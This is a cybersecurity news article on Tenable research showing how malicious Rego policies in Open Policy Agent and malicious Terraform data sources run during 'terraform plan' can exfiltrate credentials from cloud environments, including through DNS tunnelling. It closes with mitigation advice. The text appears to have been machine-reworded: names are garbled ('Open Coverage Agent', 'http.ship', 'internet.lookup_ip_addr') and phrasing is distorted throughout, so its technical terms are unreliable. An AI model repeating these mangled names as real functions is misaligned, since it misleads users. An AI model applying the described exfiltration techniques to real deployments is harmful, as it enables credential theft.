Cybersecurity researchers have disclosed two new assault methods towards infrastructure-as-code (IaC) and policy-as-code (PaC) instruments like HashiCorp’s Terraform and Open Coverage Agent (OPA) that leverage devoted, domain-specific languages (DSLs) to breach cloud platforms and exfiltrate information.
“Since these are hardened languages with restricted capabilities, they’re alleged to be safer than normal programming languages – and certainly they’re,” Tenable senior safety researcher Shelly Raban mentioned in a technical report printed final week. “Nevertheless, safer doesn’t imply bulletproof.”
OPA is a well-liked, open-source coverage engine that enables organizations to implement insurance policies throughout cloud-native environments, similar to microservices, CI/CD pipelines, and Kubernetes. Insurance policies are outlined utilizing a local question language referred to as Rego which is then evaluated by OPA to return a choice.
The assault technique devised by Tenable targets the availability chain, whereby an attacker beneficial properties unauthorized entry by way of a compromised entry key to insert a malicious Rego coverage to an OPA server, which is subsequently used through the coverage determination section to permit malicious actions like credential exfiltration utilizing a built-in perform generally known as “http.ship.”
Even in cases the place an OPA deployment restricts the usage of http.ship, the cybersecurity agency discovered that it is potential to make the most of one other perform named “internet.lookup_ip_addr” to smuggle the info utilizing DNS lookups through a method known as DNS tunneling.
“So, the online.lookup_ip_addr perform is one other perform you would possibly think about limiting or a minimum of looking for in insurance policies, because it additionally introduces the chance of information exfiltration out of your OPA deployment,” Raban mentioned.
Terraform, just like OPA, goals to simplify the method of organising, deploying, and managing cloud assets by way of code-based definitions. These configurations will be arrange utilizing one other declarative DSL referred to as HashiCorp Configuration Language (HCL).
An attacker may goal the open-source IaC platform by benefiting from its “terraform plan” command, that are sometimes triggered as a part of GitHub “pull_request” workflows, to execute unreviewed adjustments containing a malicious information supply through the CI/CD course of.
“This poses a danger, as an exterior attacker in a public repository or a malicious insider (or an exterior attacker with a foothold) in a non-public repository may exploit a pull request for his or her malicious aims,” Tenable famous. “Knowledge sources run throughout ‘terraform plan,’ which considerably lowers the entry level for attackers.”
These information sources, in flip, could possibly be a rogue exterior information supply, a Terraform module, or a DNS information supply, necessitating that solely third-party elements from trusted sources be used. A few of the different suggestions to mitigate such dangers embrace –
- Implement a granular role-based entry management (RBAC) and observe the precept of least privilege
- Arrange application-level and cloud-level logging for monitoring and evaluation
- Restrict the community and information entry of the functions and the underlying machines
- Forestall computerized execution of unreviewed and doubtlessly malicious code in CI/CD pipelines
Moreover, organizations can use IaC scanning instruments and options like Terrascan and Checkov to preemptively determine misconfigurations and compliance points previous to deployment.